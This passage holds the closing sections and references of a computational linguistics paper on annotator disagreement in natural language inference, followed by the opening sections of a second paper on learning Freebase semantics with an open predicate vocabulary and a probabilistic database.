1996), as well as more generally accepted formal- isms which assume access to boolean ground- ings, such as probabilistic soft logic (Friedman et al., 1999; Kimmig et al., 2012; Beltagy et al., 2014) and Markov logic networks (Richardson and Domingos, 2006). Also related is work on collecting and analyzing graded entailment judg- ments (de Marneffe et al., 2012). We note that the question of strict vs. graded entailment judg- ments pertains to modeling of uncertainty within an individual rater’s judgments. This is indepen- dent of the question of if/how to model disagree- ments between raters, which is the our focus in this work. Embracing Rater Disagreement. Significant past work has looked an annotator disagreement in linguistic annotations, and has advocated that this disagreement should be taken as signal rather than noise (Aroyo et al., 2018; Palomaki et al., 2018). Plank et al. (2014) showed that incorporating rater uncertainty into the loss function for a POS tagger improves downstream performance. Similar approaches have been applied in parsing (Martı́nez Alonso et al., 2015) and supersense tagging (Martı́nez Alonso et al., 2016). Specif- ically relevant to this work is past discussion of disagreement on semantic annotation tasks, in- cluding anaphora resolution (Poesio and Artstein, 2005), coreference (Versley, 2008; Recasens et al., 2011), word sense disambiguation (Erk and McCarthy, 2009; Passonneau et al., 2012; Jurgens, 2013), veridicality (Geis and Zwicky, 1971; Karttunen et al., 2014; de Marneffe et al., 2012), semantic frames (Dumitrache et al., 2019), and grounding (Reidsma and op den Akker, 2008). Most of this work focuses on the uncertainty of individual raters, oftentimes concluding that such uncertainty can be addressed by shifting to a graded rather than discrete labeling schema and/or that uncertainty can be leveraged as a means for detecting inherently ambiguous items. In contrast, we do not look at measures of uncertainty/ambiguity from the point of view of an individual (though this is a very interest- ing question); rather, we focus on disagreements that exist between raters. We agree strongly that semantic judgments should be treated as graded, and that ambiguous items should be acknowl- edged as such. Still, this is independent of the issue of inter-rater disagreement: Two raters can disagree when making graded judgments as much as they can when making discrete judgments, and they can disagree when they are both uncertain as much as they can when they are both certain. Thus, the central question of this work is whether aggre- gation (via average or majority vote) is a faith- ful representation of the underlying distribution of judgments across annotators. Arguably, such aggregation is a faithful (albeit lossy) representa- tion of high-variance unimodal distributions, but not of multi-modal ones. In this regard, particularly relevant to our work is de Marneffe et al. (2012) and de Marneffe et al. (2018), who observed similarly persistent disagreement in graded judgments of veridicality, and made a case for attempting to model the full distribution as opposed to a single aggregate score. Smith et al. (2013) present related theoretical work, which proposes specific mechanisms by 689 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 which humans might handle lexical uncertainty in the context of inference. Their model assumes pragmatic speakers and listeners who reason simultaneously about one another’s goals and about the lexicon itself, and could be used to explain differing inferences in cases where raters share different beliefs about the speaker (author) of p and/or about the lexicon. Schaekermann et al. (2016) develop a proof-of-concept annotation in- terface specifically intended to recognize whether or not inter-rater disagreement is ‘‘resolvable’’ via more annotation, or rather is likely to persist, although they don’t discuss natural language semantics directly. Finally, Tanenhaus et al. (1985) discuss the role of formal semantics and generative grammar in inference, and specifically differentiates between work which treats grammar as a causal process of how inferences occur versus work which treats grammar as a descriptive framework of the structure of language. Such dis- cussion is relevant going forward, as engineers of NLI systems must determine both how to define the evaluation task, as well as the role that concepts from formal semantics should play within such systems. 8 Conclusion We provide an in-depth study of disagreements in human judgments on the NLI task. We show that many disagreements persist even after increasing the number of annotators and the amount of context provided, and that models which represent these annotations as multimodal distributions gen- eralize better to held-out data than those which do not. We evaluate whether a state-of-the-art NLI model (BERT) captures these disagreements by virtue of producing softmax distributions over labels and show that it does not. We argue that, if NLI is to serve as an adequate intrinsic evaluation of semantic representations, then models should be evaluated in terms of their ability to predict the full expected distribution over all human raters, rather than a single aggregate score. Acknowledgments Thank you to the Action Editor Chris Potts and the anonymous reviewers for their input on earlier drafts of this paper. This work evolved substantially as a result of their suggestions and feedback. Thank you to Dipanjan Das, Michael Collins, Sam Bowman, Ankur Parikh, Emily Pitler, Yuan Zhang, and the rest of the Google Language team for many useful discussions. References Lora Aroyo, Anca Dumitrache, Praveen Paritosh, Alex Quinn, and Chris Welty, editors. 2018. Proc. Subjectivity, Ambiguity and Disagree- ment in Crowdsourcing (SAD), volume 1 of 1. HCOMP, Zurich, Switzerland. Islam Beltagy, Katrin Erk, and Raymond Mooney. 2014. Probabilistic soft logic for semantic tex- tual similarity. In Proceedings of the 52nd Annual Meeting of the Association for Compu- tational Linguistics (Volume 1: Long Papers), pages 1210–1219, Baltimore, MD. Association for Computational Linguistics. Samuel R. Bowman, Gabor Angeli, Christopher Potts, and Christopher D. Manning. 2015. A large annotated corpus for learning natural lan- guage inference. In Proceedings of the 2015 Conference on Empirical Methods in Nat- ural Language Processing, pages 632–642, Lisbon, Portugal. Association for Computa- tional Linguistics. Razvan Bunescu. 2008. Learning with probabilis- tic features for improved pipeline models. In Proceedings of the 2008 Conference on Empir- ical Methods in Natural Language Processing, pages 670–679, Honolulu, HI. Association for Computational Linguistics. Chris Callison-Burch and Mark Dredze. 2010. Creating speech and language data with Amazon’s mechanical turk. In Proceedings of the NAACL HLT 2010 Workshop on Creating Speech and Language Data with Amazon’s Me- chanical Turk, pages 1–12, Los Angeles, CA. Association for Computational Linguistics. Stergios Chatzikyriakidis, Robin Cooper, Simon Dobnik, and Staffan Larsson. 2017. An over- view of natural language inference data col- lection: The way forward? In Proceedings of the Computing Natural Language Inference Workshop. Timothy Chklovski and Patrick Pantel. 2004. VerbOcean: Mining the Web for fine-grained semantic verb relations. In Proceedings of 690 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 the 2004 Conference on Empirical Methods in Natural Language Processing, pages 33–40, Barcelona, Spain. Association for Computa- tional Linguistics. Robin Cooper, Dick Crouch, Jan Van Eijck, Chris Fox, Johan Van Genabith, Jan Jaspars, Hans Kamp, David Milward, Manfred Pinkal, Massimo Poesio, and Steve Pullman. 1996, Using the framework. Technical report, Technical Report LRE 62-051 D-16, The FraCaS Consortium. Ido Dagan, Oren Glickman, and Bernardo Magnini. 2006, The PASCAL recognising tex- tual entailment challenge. In Machine Learning Challenges. Evaluating Predictive Uncertainty, Visual Object Classification, and Recognising Textual Entailment, pages 177–190. Springer Ishita Dasgupta, Demi Guo, Andreas Stuhlmüller, Samuel J. Gershman, and Noah D. Goodman. 2018. Evaluating compositionality in sentence embeddings. arXiv preprint arXiv:1802.04302. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. 2019. BERT: Pre- training of deep bidirectional transformers for language understanding. In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technolo- gies, Volume 1 (Long and Short Papers), pages 4171–4186, Minneapolis, MN. Associ- ation for Computational Linguistics. Anca Dumitrache, Lora Aroyo, and Chris Welty. 2019. A crowdsourced frame disambiguation corpus with ambiguity. In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long and Short Papers), pages 2164– 2170, Minneapolis, MN. Association for Com- putational Linguistics. Anca Dumitrache, Lora Aroyo, Christopher A. Welty, Robert-Jan Sips, and Anthony Levas. 2013. Dr. Detective: Combining gamification techniques and crowdsourcing to create a gold standard for the medical domain. In CrowdSem Workshop at the International Semantic Web Conference. Katrin Erk and Diana McCarthy. 2009. Graded word sense assignment. In Proceedings of the 2009 Conference on Empirical Methods in Natural Language Processing, pages 440–449, Singapore. Association for Computational Linguistics. Allyson Ettinger, Ahmed Elgohary, Colin Phillips, and Philip Resnik. 2018. Assessing composition in sentence vector representations. In Proceedings of the 27th International Conference on Computational Linguistics, pages 1790–1801, Santa Fe, NM. Association for Computational Linguistics. Christiane Fellbaum. 1998. WordNet, Wiley Online Library. Jenny Rose Finkel, Christopher D. Manning, and Andrew Y. Ng. 2006. Solving the problem of cascading errors: Approximate Bayesian inference for linguistic annotation pipelines. In Proceedings of the 2006 Conference on Empirical Methods in Natural Language Pro- cessing, pages 618–626, Sydney, Australia. Association for Computational Linguistics. Nir Friedman, Lise Getoor, Daphne Koller, and Avi Pfeffer. 1999. Learning probabilistic relational models. In IJCAI, 99: 1300–1309. Konstantina Garoufi. 2007. Towards a Better Understanding of Applied Textual Entailment. Ph.D. thesis, Citeseer. Michael L. Geis and Arnold M. Zwicky. 1971. On invited inferences. Linguistic inquiry, 2(4):561–566. Marti A. Hearst. 1992. Automatic acquisition of hyponyms from large text corpora. In COLING 1992 Volume 2: The 15th International Con- ference on Computational Linguistics. Rafal Józefowicz, Oriol Vinyals, Mike Schuster, Noam Shazeer, and Yonghui Wu. 2016. Exploring the limits of language modeling. ArXiv, abs/1602.02410. David Jurgens. 2013. Embracing ambiguity: A comparison of annotation methodologies for crowdsourcing word sense labels. In Proceedings of the 2013 Conference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, pages 556–562, Atlanta, GA. Association for Computational Linguistics. 691 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 Lauri Karttunen, Stanley Peters, Annie Zaenen, and Cleo Condoravdi. 2014. The chameleon- like nature of evaluative adjectives. Empirical Issues in Syntax and Semantics, 10:233–250. Angelika Kimmig, Stephen Bach, Matthias Broecheler, Bert Huang, and Lise Getoor. 2012. A short introduction to probabilistic soft logic. In Proceedings of the NIPS Workshop on Probabilistic Programming: Foundations and Applications, pages 1–4. Volodymyr Kuleshov and Percy S. Liang. 2015. Calibrated structured prediction. In Advances in Neural Information Processing Systems, pages 3474–3482. Christopher D. Manning. 2006. Local textual inference: Its hard to circumscribe, but you know it when you see it–and NLP needs it. https://nlp.stanford.edu/manning/papers/Textual Inference.pdf Marie-Catherine de Marneffe, Mandy Simons, and Judith Tonhauser. 2018. Factivity in doubt: Clause-embedding predicates in naturally occurring discourse. Sinn und Bedeutung 23 (Poster). Marie-Catherine de Marneffe, Christopher D. Manning, and Christopher Potts. 2012. Did it happen? The pragmatic complexity of verid- icality assessment. Computational Linguistics, 38(2):301–333. Héctor Martı́nez Alonso, Anders Johannsen, and Barbara Plank. 2016. Supersense tagging with inter-annotator disagreement. In Proceedings of the 10th Linguistic Annotation Workshop held in conjunction with ACL 2016 (LAW-X 2016), pages 43–48, Berlin, Germany. Association for Computational Linguistics. Héctor Martı́nez Alonso, Barbara Plank, Arne Skjærholt, and Anders Søgaard. 2015. Learning to parse with IAA-weighted loss. In Proceed- ings of the 2015 Conference of the North American Chapter of the Association for Com- putational Linguistics: Human Language Tech- nologies, pages 1357–1361, Denver, CO. Association for Computational Linguistics. Tom McCoy, Ellie Pavlick, and Tal Linzen. 2019. Right for the wrong reasons: Diagnosing syn- tactic heuristics in natural language inference. In Proceedings of the 57th Annual Meeting of the Association for Computational Lin- guistics, pages 3428–3448, Florence, Italy. Association for Computational Linguistics. Richard Montague. 1970. Universal grammar. Theoria, 36(3):373–398. Jennimaria Palomaki, Olivia Rhinehart, and Michael Tseng. 2018. A case for a range of acceptable annotations. In Proceedings of Workshop on Subjectivity, Ambiguity, and Disagreement (SAD). HCOMP. Rebecca J. Passonneau, Vikas Bhardwaj, Ansaf Salleb-Aouissi, and Nancy Ide. 2012. Multi- plicity and word sense: Evaluating and learning from multiply labeled word sense annota- tions. Language Resources and Evaluation, 46(2):219–252. Ellie Pavlick and Chris Callison-Burch. 2016a. Most ‘‘babies’’ are ‘‘little’’ and most ‘‘prob- lems’’ are ‘‘huge’’: Compositional entailment in adjective-nouns. In Proceedings of the 54th Annual Meeting of the Association for Compu- tational Linguistics (Volume 1: Long Papers), pages 2164–2173, Berlin, Germany. Associa- tion for Computational Linguistics. Ellie Pavlick and Chris Callison-Burch. 2016b. So-called non-subsective adjectives. In Pro- ceedings of the Fifth Joint Conference on Lexical and Computational Semantics, pages 114–119, Berlin, Germany. Association for Computational Linguistics. Barbara Plank, Dirk Hovy, and Anders Søgaard. 2014. Learning part-of-speech taggers with inter-annotator agreement loss. In Proceedings of the 14th Conference of the European Chapter of the Association for Computational Lin- guistics, pages 742–751, Gothenburg, Sweden. Association for Computational Linguistics. Massimo Poesio and Ron Artstein. 2005. The reli- ability of anaphoric annotation, reconsidered: Taking ambiguity into account. In Proceed- ings of the Workshop on Frontiers in Corpus Annotations II: Pie in the Sky, pages 76–83, Ann Arbor, MI. Association for Computational Linguistics. Massimo Poesio, Jon Chamberlain, Silviu Paun, Juntao Yu, Alexandra Uma, and Udo Kruschwitz. 692 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 2019. A crowdsourced corpus of multiple judg- ments and disagreement on anaphoric interpre- tation. In Proceedings of the 2019 Conference of the North American Chapter of the Association for Computational Linguistics: Human Lan- guage Technologies, Volume 1 (Long and Short Papers), pages 1778–1789, Minneapolis, MN. Association for Computational Linguistics. Adam Poliak, Yonatan Belinkov, James Glass, and Benjamin Van Durme. 2018a. On the evaluation of semantic phenomena in neural machine translation using natural language inference. In Proceedings of the 2018 Conference of the North American Chapter of the Association for Computational Linguistics: Human Lan- guage Technologies, Volume 2 (Short Papers), pages 513–523, New Orleans, LA. Association for Computational Linguistics. Adam Poliak, Aparajita Haldar, Rachel Rudinger, J. Edward Hu, Ellie Pavlick, Aaron Steven White, and Benjamin Van Durme. 2018b. Collecting diverse natural language inference problems for sentence representation evalua- tion. In Proceedings of the 2018 Conference on Empirical Methods in Natural Language Processing, pages 67–81, Brussels, Belgium. Association for Computational Linguistics. Marta Recasens, Eduard Hovy, and M. Antònia Martı́. 2011. Identity, non-identity, and near- identity: Addressing the complexity of coref- erence. Lingua, 121(6):1138–1152. Dennis Reidsma and Rieks op den Akker. 2008. Exploiting ‘subjective’ annotations. In Coling 2008: Proceedings of the workshop on Hu- man Judgements in Computational Linguistics, pages 8–16, Manchester, UK. Coling 2008 Organizing Committee. Matthew Richardson and Pedro Domingos. 2006. Markov logic networks. Machine Learning, 62(1–2):107–136. Mike Schaekermann, Edith Law, Alex C. Williams, and William Callaghan. 2016. Re- solvable vs. irresolvable ambiguity: A new hybrid framework for dealing with uncertain ground truth. In 1st Workshop on Human- Centered Machine Learning at SIGCHI. Mandy Simons, Judith Tonhauser, David Beaver, and Craige Roberts. 2010. What projects and why. Semantics and Linguistic Theory, 20: 309–327. Nathaniel J. Smith, Noah Goodman, and Michael Frank. 2013. Learning and using language via recursive pragmatic reasoning about other agents. In Advances in Neural Information Processing Systems, pages 3039–3047. Rion Snow, Brendan O’Connor, Daniel Jurafsky, and Andrew Ng. 2008. Cheap and fast—but is it good? Evaluating non-expert annotations for natural language tasks. In Proceedings of the 2008 Conference on Empirical Methods in Natural Language Processing, pages 254–263, Honolulu, HI. Association for Computational Linguistics. M. Tanenhaus, G. Carlson, and M. S. Seidenberg. 1985. Do listeners compute linguistic repre- sentations? D. Dowty, L. Karttunen, and A. Zwicky, editors, Natural Language Parsing. Cambridge University Press. Judith Tonhauser, David I. Beaver, and Judith Degen. 2018. How Projective is Projective Con- tent? Gradience in Projectivity and At-issueness. Journal of Semantics, 35(3):495–542. Y. Versley. 2008. Vagueness and referential ambiguity in a large-scale annotated corpus. Re- search on Language and Computation, 6:333–353. Matthijs Westera and Gemma Boleda. 2019. Don’t blame distributional semantics if it can’t do entailment. In Proceedings of the 13th International Conference on Computational Semantics - Long Papers, pages 120–133, Gothenburg, Sweden. Association for Com- putational Linguistics. Aaron S. White, Valentine Hacquard, and Jeffrey Lidz. 2018. Semantic information and the syntax of propositional attitude verbs. Cognitive Science, 42(2):416–456. Aaron Steven White, Pushpendre Rastogi, Kevin Duh, and Benjamin Van Durme. 2017. In- ference is everything: Recasting semantic resources into a unified evaluation framework. In Proceedings of the Eighth International Joint Conference on Natural Language Processing (Volume 1: Long Papers), pages 996–1005, 693 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 Taipei, Taiwan. Asian Federation of Natural Language Processing. Aaron Steven White and Kyle Rawlins. 2017. The role of veridicality and factivity in clause selection. 48th Annual Meeting of the North East Linguistic Society, Reykjavı́k. http:// iceland2017.nelsconference.org/wp-content/ uploads/2017/08/White-Rawlins.pdf. Adina Williams, Nikita Nangia, and Samuel Bowman. 2018. A broad-coverage challenge corpus for sentence understanding through inference. In Proceedings of the 2018 Con- ference of the North American Chapter of the Association for Computational Linguistics: Human Language Technologies, Volume 1 (Long Papers), pages 1112–1122, New Orleans, LA. Association for Computational Linguistics. Lotfi A. Zadeh. 1994. Fuzzy logic, neural net- works, and soft computing. Communications of the ACM, 37(3):77–84. Lotfi A. Zadeh. 1996. Fuzzy logic = computing with words. IEEE Transactions on Fuzzy Sys- tems, 4(2):103–111. Bianca Zadrozny and Charles Elkan. 2002. Transforming classifier scores into accurate multiclass probability estimates. In Proceedings of the Eighth ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, pages 694–699. ACM. Annie Zaenen, Lauri Karttunen, and Richard Crouch. 2005. Local textual inference: Can it be defined or circumscribed? In Proceedings of the ACL Workshop on Empirical Modeling of Semantic Equivalence and Entailment, pages 31–36, Ann Arbor, MI. Association for Computational Linguistics. Sheng Zhang, Rachel Rudinger, Kevin Duh, and Benjamin Van Durme. 1996. Ordinal Common-sense Inference. Transactions of the Association for Computational Linguistics, 5:379–395. https://www.aclweb.org/anthology/ Q17-1027. doi:10.1162/tac a 00068. 694 Downloaded from http://www.mitpressjournals.org/doi/pdf/10.1162/tacl_a_00293 by Carnegie Mellon University user on 06 April 2021 http://iceland2017.nelsconference.org/wp-content/uploads/2017/08/White-Rawlins.pdf http://iceland2017.nelsconference.org/wp-content/uploads/2017/08/White-Rawlins.pdf http://iceland2017.nelsconference.org/wp-content/uploads/2017/08/White-Rawlins.pdf https://www.aclweb.org/anthology/Q17-1027 https://www.aclweb.org/anthology/Q17-1027 Introduction The RTE/NLI Task NLI Data and Annotation Sentence Pairs Annotation Preprocessing Analysis of Human Judgments Experimental Design Results Analysis of Model Predictions Motivation Experimental Design Results Discussion Related Work Conclusion work_osxqmwo2yjakvpw3wcmliie4ri ---- Learning a Compositional Semantics for Freebase with an Open Predicate Vocabulary Jayant Krishnamurthy Carnegie Mellon University 5000 Forbes Avenue Pittsburgh, PA 15213 jayantk@cs.cmu.edu Tom M. Mitchell Carnegie Mellon University 5000 Forbes Avenue Pittsburgh, PA 15213 tom.mitchell@cmu.edu Abstract We present an approach to learning a model- theoretic semantics for natural language tied to Freebase. Crucially, our approach uses an open predicate vocabulary, enabling it to produce denotations for phrases such as “Re- publican front-runner from Texas” whose se- mantics cannot be represented using the Free- base schema. Our approach directly converts a sentence’s syntactic CCG parse into a log- ical form containing predicates derived from the words in the sentence, assigning each word a consistent semantics across sentences. This logical form is evaluated against a learned probabilistic database that defines a distribu- tion over denotations for each textual pred- icate. A training phase produces this prob- abilistic database using a corpus of entity- linked text and probabilistic matrix factoriza- tion with a novel ranking objective function. We evaluate our approach on a compositional question answering task where it outperforms several competitive baselines. We also com- pare our approach against manually annotated Freebase queries, finding that our open pred- icate vocabulary enables us to answer many questions that Freebase cannot. 1 Introduction Traditional knowledge representation assumes that world knowledge can be encoded using a closed vocabulary of formal predicates. In recent years, semantic parsing has enabled us to build compo- sitional models of natural language semantics us- ing such a closed predicate vocabulary (Zelle and Mooney, 1996; Zettlemoyer and Collins, 2005). These semantic parsers map natural language state- ments to database queries, enabling applications such as answering questions using a large knowl- edge base (Yahya et al., 2012; Krishnamurthy and Mitchell, 2012; Cai and Yates, 2013; Kwiatkowski et al., 2013; Berant et al., 2013; Berant and Liang, 2014; Reddy et al., 2014). Furthermore, the model- theoretic semantics provided by such parsers have the potential to improve performance on other tasks, such as information extraction and coreference res- olution. However, a closed predicate vocabulary has inher- ent limitations. First, its coverage will be limited, as such vocabularies are typically manually con- structed. Second, it may abstract away potentially relevant semantic differences. For example, the se- mantics of “Republican front-runner” cannot be ad- equately encoded in the Freebase schema because it lacks the concept of a “front-runner.” We could choose to encode this concept as “politician” at the cost of abstracting away the distinction between the two. As this example illustrates, these two problems are prevalent in even the largest knowledge bases. An alternative paradigm is an open predicate vocabulary, where each natural language word or phrase is given its own formal predicate. This paradigm is embodied in both open information ex- traction (Banko et al., 2007) and universal schema (Riedel et al., 2013). Open predicate vocabularies have the potential to capture subtle semantic distinc- tions and achieve high coverage. However, we have yet to develop compelling approaches to composi- tional semantics within this paradigm. This paper takes a step toward compositional se- 257 Transactions of the Association for Computational Linguistics, vol. 3, pp. 257–270, 2015. Action Editor: Katrin Erk. Submission batch: 12/2014; Revision batch 3/2015; Published 5/2015. c©2015 Association for Computational Linguistics. Distributed under a CC-BY-NC-SA 4.0 license. Input Text Republican front-runner from Texas → Logical Form λx.∃y,z.FRONT-RUNNER(x)∧y = /EN/REPUBLICAN∧NN(y,x)∧z = /EN/TEXAS ∧ FROM(x,z) → Entity Prob. /EN/GEORGE BUSH 0.57 /EN/RICK PERRY 0.45 ... φ θ TEXAS REPUB. G. BUSH ... F. -R U N . P O L . S T A T E .. . Entity/Predicate Embeddings φ θ (G. BUSH, TEXAS) (G. BUSH, REPUB.) (REPUB., G. BUSH) ... F R O M L IV E S IN N N .. . → TEXAS REPUB. G. BUSH ... F. -R U N . P O L . S T A T E .. . .1 .1 .9 .1 .1 .9 .8 .1 .1 Probabilistic Database (G. BUSH, TEXAS) (G. BUSH, REPUB.) (REPUB., G. BUSH) ... F R O M L IV E S IN N N .. . .9 .1 .1 .9 .1 .1 .1 .1 .7 Figure 1: Overview of our approach. Top left: the text is converted to logical form by CCG syntactic parsing and a collection of manually-defined rules. Bottom: low-dimensional embeddings of each entity (entity pair) and category (relation) are learned from an entity-linked web corpus. These embeddings are used to construct a probabilistic database. The labels of these matrices are shortened for space reasons. Top right: evaluating the logical form on the probabilistic database computes the marginal probability that each entity is an element of the text’s denotation. mantics with an open predicate vocabulary. Our ap- proach defines a distribution over denotations (sets of Freebase entities) given an input text. The model has two components, shown in Figure 1. The first component is a rule-based semantic parser that uses a syntactic CCG parser and manually-defined rules to map entity-linked texts to logical forms contain- ing predicates derived from the words in the text. The second component is a probabilistic database with a possible worlds semantics that defines a dis- tribution over denotations for each textually-derived predicate. This database assigns independent prob- abilities to individual predicate instances, such as P(FRONT-RUNNER(/EN/GEORGE BUSH)) = 0.9. Together, these components define an exponentially- large distribution over denotations for an input text; to simplify this output, we compute the marginal probability, over all possible worlds, that each entity is an element of the text’s denotation. The learning problem in our approach is to train the probabilistic database to predict a denotation for each predicate. We pose this problem as probabilis- tic matrix factorization with a novel query/answer ranking objective. This factorization learns a low- dimensional embedding of each entity (entity pair) and category (relation) such that the denotation of a predicate is likely to contain entities or entity pairs with nearby vectors. To train the database, we first collect training data by analyzing entity-linked sen- tences in a large web corpus with the rule-based semantic parser. This process generates a collec- tion of logical form queries with observed entity an- swers. The query/answer ranking objective, when optimized, trains the database to rank the observed answers for each query above unobserved answers. We evaluate our approach on a question answer- ing task, finding that our approach outperforms sev- eral baselines and that our new training objective improves performance over a previously-proposed objective. We also evaluate the trade-offs between open and closed predicate vocabularies by compar- ing our approach to a manually-annotated Freebase query for each question. This comparison reveals that, when Freebase contains predicates that cover the question, it achieves higher precision and recall than our approach. However, our approach can cor- rectly answer many questions not covered by Free- base. 2 System Overview The purpose of our system is to predict a denota- tion γ for a given natural language text s. The de- notation γ is the set of Freebase entities that s refers to; for example, if s = “president of the US,” then γ = {/EN/OBAMA, /EN/BUSH, ...}.1 Our system 1This paper uses a simple model-theoretic semantics where the denotation of a noun phrase is a set of entities and the de- notation of a sentence is either true or false. However, for no- tational convenience, denotations γ will be treated as sets of entities throughout. 258 represents this prediction problem using the follow- ing probabilistic model: P(γ|s) = ∑ w ∑ ` P(γ|`,w)P(w)P(`|s) The first term in this factorization, P(`|s), is a dis- tribution over logical forms ` given the text s. This term corresponds to the rule-based semantic parser (Section 3). This semantic parser is deterministic, so this term assigns probability 1 to a single logical form for each text. The second term, P(w), repre- sents a distribution over possible worlds, where each world is an assignment of truth values to all possible predicate instances. The distribution over worlds is represented by a probabilistic database (Section 4). The final term, P(γ|`,w), deterministically evalu- ates the logical form ` on the world w to produce a denotation γ. This term represents query evaluation against a fixed database, as in other work on seman- tic parsing. Section 5 describes inference in our model. To produce a ranked list of entities (Figure 1, top right) from P(γ|s), our system computes the marginal probability that each entity is an element of the de- notation γ. This problem corresponds to query eval- uation in a probabilistic database, which is known to be tractable in many cases (Suciu et al., 2011). Section 6 describes training, which estimates pa- rameters for the probabilistic database P(w). This step first automatically generates training data using the rule-based semantic parser. This data is used to formulate a matrix factorization problem that is op- timized to estimate the database parameters. 3 Rule-Based Semantic Parser The first part of our compositional semantics system is a rule-based system that deterministically com- putes a logical form ` for a text s. This component is used during inference to analyze the logical struc- ture of text, and during training to generate training data (see Section 6.1). Several input/output pairs for this system are shown in Figure 2. The conversion to logical form has 3 phases: 1. CCG syntactic parsing parses the text and ap- plies several deterministic syntactic transfor- mations to facilitate semantic analysis. 2. Entity linking marks known Freebase entities in the text. 3. Semantic analysis assigns a logical form to each word, then composes them to produce a logical form for the complete text. 3.1 Syntactic Parsing The first step in our analysis is to syntactically parse the text. We use the ASP-SYN parser (Kr- ishnamurthy and Mitchell, 2014) trained on CCG- Bank (Hockenmaier and Steedman, 2002). We then automatically transform the resulting syntactic parse to make the syntactic structure more amenable to semantic analysis. This step marks NPs in conjunctions by replacing their syntactic category with NP[conj]. This transformation allows seman- tic analysis to distinguish between appositives and comma-separated lists. It also transforms all verb ar- guments to core arguments, i.e., using the category PP/NP as opposed to ((S\NP)\(S\NP))/NP. This step simplifies the semantic analysis of verbs with prepositional phrase arguments. The final transformation adds a word feature to each PP cat- egory, e.g., mapping PP to PP[by]. These features are used to generate verb-preposition relation predi- cates, such as DIRECTED BY. 3.2 Entity Linking The second step is to identify mentions of Freebase entities in the text. This step could be performed by an off-the-shelf entity linking system (Ratinov et al., 2011; Milne and Witten, 2008) or string matching. However, our training and test data is derived from Clueweb 2009, so we rely on the entity linking for this corpus provided by Gabrilovich et. al (2013). Our system incorporates the provided entity links into the syntactic parse provided that they are con- sistent with the parse structure. Specifically, we re- quire that each mention is either (1) a constituent in the parse tree with syntactic category N or NP or (2) a collection of N/N or NP/NP modifiers with a single head word. The first case covers noun and noun phrase mentions, while the second case cov- ers noun compounds. In both cases, we substitute a single multi-word terminal into the parse tree span- ning the mention and invoke special semantic rules for mentions described in the next section. 259 Dan Hesse, CEO of Sprint λx.∃y.x = /EN/DAN HESSE ∧ CEO(x)∧ OF(x,y)∧y = /EN/SPRINT Yankees pitcher λx.∃y.PITCHER(x)∧ NN(y,x)∧y = /EN/YANKEES Tom Cruise plays Maverick in the movie Top Gun. ∃x,y,z.x = /EN/TOM CRUISE ∧ PLAYS(x,y) ∧ y = /EN/MAVERICK (CHARACTER) ∧ PLAYS IN(x,z)∧z = /EN/TOP GUN Figure 2: Example input/output pairs for our seman- tic analysis system. Mentions of Freebase entities in the text are indicated by underlines. 3.3 Semantic analysis The final step uses the syntactic parse and entity links to produce a logical form for the text. The sys- tem induces a logical form for every word in the text based on its syntactic CCG category. Composing these logical forms according to the syntactic parse produces a logical form for the entire text. Our semantic analyses are based on a relatively naı̈ve model-theoretic semantics. We focus on lan- guage whose semantics can be represented with existentially-quantified conjunctions of unary and binary predicates, ignoring, for example, tempo- ral scope and superlatives. Generally, our sys- tem models nouns and adjectives as unary predi- cates, and verbs and prepositions as binary predi- cates. Special multi-word predicates are generated for verb-preposition combinations. Entity mentions are mapped to the mentioned entity in the logical form. We also created special rules for analyzing conjunctions, appositives, and relativizing conjunc- tions. The complete list of rules used to produce these logical forms is available online.2 We made several notable choices in designing this component. First, multi-argument verbs are ana- lyzed using pairwise relations, as in the third exam- ple in Figure 2. This analysis allows us to avoid rea- soning about entity triples (quadruples, etc.), which are challenging for the matrix factorization due to sparsity. Second, noun-preposition combinations are analyzed as a category and relation, as in the first example in Figure 2. We empirically found that combining the noun and preposition in such 2http://rtw.ml.cmu.edu/tacl2015_csf instances resulted in worse performance, as it dra- matically increased the sparsity of training instances for the combined relations. Third, entity mentions with the N/N category are analyzed using a spe- cial noun-noun relation, as in the second example in Figure 2. Our intuition is that this relation shares instances with other relations (e.g., “city in Texas” implies “Texan city”). Finally, we lowercased each word to create its predicate name, but performed no lemmatization or other normalization. 3.4 Discussion The scope of our semantic analysis system is some- what limited relative to other similar systems (Bos, 2008; Lewis and Steedman, 2013) as it only out- puts existentially-quantified conjunctions of predi- cates. Our goal in building this system was to an- alyze noun phrases and simple sentences, for which this representation generally suffices. The reason for this focus is twofold. First, this subset of language is sufficient to capture much of the language surround- ing Freebase entities. Second, for various techni- cal reasons, this restricted semantic representation is easier to use (and more informative) for training the probabilistic database (see Section 6.3). Note that this system can be straightforwardly ex- tended to model additional linguistic phenomena, such as additional logical operators and generalized quantifiers, by writing additional rules. The seman- tics of logical forms including these operations are well-defined in our model, and the system does not even need to be re-trained to incorporate these addi- tions. 4 Probabilistic Database The second part of our compositional semantics sys- tem is a probabilistic database. This database rep- resents a distribution over possible worlds, where each world is an assignment of truth values to ev- ery predicate instance. Equivalently, the probabilis- tic database can be viewed as a distribution over databases or knowledge bases. Formally, a probabilistic database is a collection of random variables, each of which represents the truth value of a single predicate instance. Given en- tities e ∈ E, categories c ∈ C, and relations r ∈ R the probabilistic database contains boolean random 260 variables c(e) and r(e1,e2) for each category and relation instance, respectively. All of these ran- dom variables are assumed to be independent. Let a world w represent an assignment of truth values to all of these random variables, where c(e) = wc,e and r(e1,e2) = wr,e1,e2 . By independence, the probabil- ity of a world can be written as: P(w) = ∏ e∈E ∏ c∈C P(c(e) = wc,e)× ∏ e1∈E ∏ e2∈E ∏ r∈R P(r(e1,e2) = wr,e1,e2) The next section discusses how probabilistic ma- trix factorization is used to model the probabilities of these predicate instances. 4.1 Matrix Factorization Model The probabilistic matrix factorization model treats the truth of each predicate instance as an indepen- 